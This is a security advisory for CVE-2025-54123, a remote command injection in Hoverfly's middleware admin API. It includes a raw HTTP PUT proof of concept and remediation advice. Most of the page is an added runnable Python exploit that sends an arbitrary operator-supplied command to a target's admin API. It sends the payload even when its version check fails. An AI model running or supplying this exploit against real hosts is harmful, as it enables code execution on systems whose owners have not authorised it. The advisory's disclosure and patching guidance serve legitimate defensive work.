Remote Code Execution in Hoverfly Middleware API (/api/v2/hoverfly/middleware)
CVE
CVE-2025-54123
Product
Hoverfly
Published
9/11/2025
Researcher
Krishna Agarwal
Summary
A command injection vulnerability was identified in Hoverfly's middleware management API at /api/v2/hoverfly/middleware due to unsafe handling of user-supplied input. The `binary` and `script` values from the request body are passed directly to system command execution during middleware validation, so an attacker-controlled binary runs as soon as the request is processed, with no further interaction required. Successful exploitation yields remote code execution with the privileges of the Hoverfly process and can be used to run arbitrary commands or spawn reverse shells. This flaw poses a critical risk to any reachable instance running a vulnerable Hoverfly version.
Proof of Concept
Preconditions
- A vulnerable Hoverfly instance is running
- Admin API is accessible (default: `http://<target>:8888`)
- The admin API has no authentication enabled, or valid admin credentials are available
Send the following HTTP PUT request to the middleware endpoint. The payload sets the `binary` field to /bin/bash and supplies the command to run in the `script` field; a blank line separates the headers from the JSON body, and Content-Length must match the body so the server reads it in full.
```
PUT /api/v2/hoverfly/middleware HTTP/1.1
Host: localhost:8888
Content-Type: application/json
Content-Length: 42
Connection: close

{"binary": "/bin/bash","script": "whoami"}
```
During middleware validation, Hoverfly writes the script to a temporary file and immediately executes it using the user-controlled binary; the middleware does not need to be triggered by a proxied request. The command runs with the privileges of the Hoverfly process.
Remediation
This vulnerability has been addressed in Hoverfly version v1.12.0 and later. Upgrade to v1.12.0 or later; until the upgrade is done, do not expose the admin API (port 8888 by default) beyond trusted hosts and enable authentication on it, since the preconditions above are simply a reachable admin API without credentials.
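A runnable form of the proof-of-concept request above, combined with a pre-flight check against the fixed version named in the remediation. This is an added example written for this page, not code from the researcher or from the Hoverfly project. It builds the PUT request with a Content-Length derived from the JSON body, optionally attaches a Bearer token, and refuses to send the payload when the target reports v1.12.0 or later. The `GET /api/v2/hoverfly/version` endpoint, its `{"version": "vX.Y.Z"}` response shape, and Bearer-token authentication on the admin API are assumptions about Hoverfly not stated on this page; the `token` argument and all helper names are the example's own.

```python
import json
import socket
import sys

# Per the advisory, v1.12.0 and later contain the fix; anything older is affected.
FIXED_VERSION = (1, 12, 0)


def parse_version(version: str) -> tuple:
    """Turn a version string such as 'v1.11.2' into a (major, minor, patch) tuple.

    A leading 'v' and any pre-release/build suffix ('-rc1', '+abc') are dropped.
    """
    core = version.strip().lstrip("v").split("-", 1)[0].split("+", 1)[0]
    nums = [int(p) for p in core.split(".")[:3]]
    return tuple(nums + [0] * (3 - len(nums)))


def is_vulnerable_version(version: str) -> bool:
    """True when the reported version predates the fixed release (v1.12.0)."""
    return parse_version(version) < FIXED_VERSION


def build_middleware_request(host: str, binary: str, script: str, token=None) -> bytes:
    """Build the raw PUT /api/v2/hoverfly/middleware request from the advisory.

    The body is JSON-encoded so quotes and backslashes in `script` are escaped, and
    Content-Length is computed from the encoded body so the server reads all of it.
    `token`, if given, is sent as a Bearer token (assumption: that is how an
    authenticated Hoverfly admin API expects credentials; not stated in the advisory).
    """
    body = json.dumps({"binary": binary, "script": script}).encode()
    lines = [
        "PUT /api/v2/hoverfly/middleware HTTP/1.1",
        f"Host: {host}",
        "Content-Type: application/json",
        f"Content-Length: {len(body)}",
        "Connection: close",
    ]
    if token:
        lines.append(f"Authorization: Bearer {token}")
    # Blank line (CRLF CRLF) terminates the header block before the body.
    return ("\r\n".join(lines) + "\r\n\r\n").encode() + body


def split_response(raw: bytes) -> tuple:
    """Split a raw HTTP/1.1 response into (status_code, body_text)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status = int(head.split(b"\r\n", 1)[0].split()[1])
    return status, body.decode(errors="replace")


def send_raw(host: str, port: int, request: bytes, timeout: float = 10.0) -> bytes:
    """Send a raw request over TCP and return everything the server sends back."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    # Usage: python poc.py <host> [port] [command] [token]
    target = sys.argv[1] if len(sys.argv) > 1 else "localhost"
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 8888
    command = sys.argv[3] if len(sys.argv) > 3 else "whoami"
    token = sys.argv[4] if len(sys.argv) > 4 else None
    host_header = f"{target}:{port}"

    # Assumption: the admin API answers GET /api/v2/hoverfly/version with {"version": "vX.Y.Z"}.
    version_req = (
        f"GET /api/v2/hoverfly/version HTTP/1.1\r\nHost: {host_header}\r\nConnection: close\r\n\r\n"
    ).encode()
    status, body = split_response(send_raw(target, port, version_req))
    try:
        version = json.loads(body).get("version", "") if status == 200 else ""
    except ValueError:
        version = ""
    print(f"[*] version endpoint -> {status} {body.strip()}")
    if version and not is_vulnerable_version(version):
        print(f"[-] {version} is at or after v1.12.0; not sending the payload")
        sys.exit(0)

    poc = build_middleware_request(host_header, "/bin/bash", command, token)
    status, body = split_response(send_raw(target, port, poc))
    print(f"[*] middleware endpoint -> {status}\n{body}")
```

If the version endpoint is unreachable or returns something unexpected, the script still sends the payload, so run it only against hosts you are authorised to test. The advisory does not state what the endpoint returns on success, so the script prints the raw status and body rather than parsing command output out of it.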